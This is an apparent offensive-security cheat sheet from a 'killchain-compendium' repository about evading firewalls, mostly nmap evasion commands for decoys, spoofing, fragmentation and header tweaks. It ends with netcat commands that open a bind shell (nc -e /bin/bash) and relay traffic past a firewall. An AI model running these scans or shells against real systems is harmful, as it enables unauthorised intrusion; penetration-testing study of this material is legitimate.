whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Reverse Shells/Firewall Bypass.md

2.5 KiB
Raw Blame History

Firewall Handling and Bypassing

Types

  • Packet filtering
  • Circuit level gateway
  • Stateful inspection
  • Proxy
  • Next generation firewall
  • Cloud firewall and FWaaS

Rules

  • Firewalls follow rules sets configured like in the example below

Windows

netsh advfirewall firewall add rule name="muka" dir=in action=allow protocol=tcp localport=57869

Linux

firewall-cmd --zone=public --add-port=57869/tcp

Bypassing Firewalls

  • IP/MAC/Port spoofing
  • Fragmentation, MTU, data length
  • Header modification

nmap

  • nmap contains multiple measures which can be used to circumvent firewalls securing the target we want to connect to.

Spoofing

  • Decoy -D , shuffle existing IP address with random adresses. Every port will be requested by any of these addresses.
sudo nmap -Pn -D 192.168.0.23,192.168.0.42,ME -F $TARGET_IP
sudo nmap -Pn -D RND,RND,ME -F $TARGET_IP
  • Proxy
sudo nmap -Pn -F --proxies $PROXY_IP $TARGET_IP
  • Spoofed MAC
sudo nmap -Pn -F --spoof-mac $MAC_ADDRESS $TARGET_IP
  • Spoofed IP
sudo nmap -Pn -F -S $ATTACKER_IP $TARGET_IP
  • Port Number, select a port which is whitelisted. Frequently this is 53,80,44
sudo nmap -F --source-port 443 $TARGET_IP
  • Fragmentation, eth header + 20 bytes header size + bytes fragments via -f, or 16 bytes via -ff
sudo nmap -Pn -F -f $TARGET_IP
  • MTU, works like fragmentation, -f == --mtu 8
sudo nmap -Pn -F --mtu 8
  • DATA Length, eth header + IP header + prepend padding segment size to values of bytes
sudo nmap -Pn -F --data-length 64 $TARGET_IP

Header Fields

  • TTL
sudo nmap -Pn -F --ttl 64 $TARGET_IP

  • IP OPTIONS, --ip-options recordsas hex String

    • Route, R
    • Timestamp, T
    • Route + Timestamp, U
    • Loose source routing, L $IP $IP $IP
    • Strict source routing, S $IP $IP $IP

  • Checksum, craft bad checksum via --badsum to check errors

sudo nmap -Pn -F --badsum $TARGET_IP

Post FW

After the firewall has been bypassed there are further possible steps to gain foothold. One of them is to open a bind shell on standard ports which are usually not covered by firewall configurations like 443 or 80.

  • Hopping, listen via netcat to catch that port
  • Tunneling, relay open after passsing the firewall to connect to the closed port
nc -lvnp 443 --sh-exec "nc $TARGET_IP 25"
  • Non standard ports, open bin shell via
nc -lvnp 8888 -e /bin/bash

and connect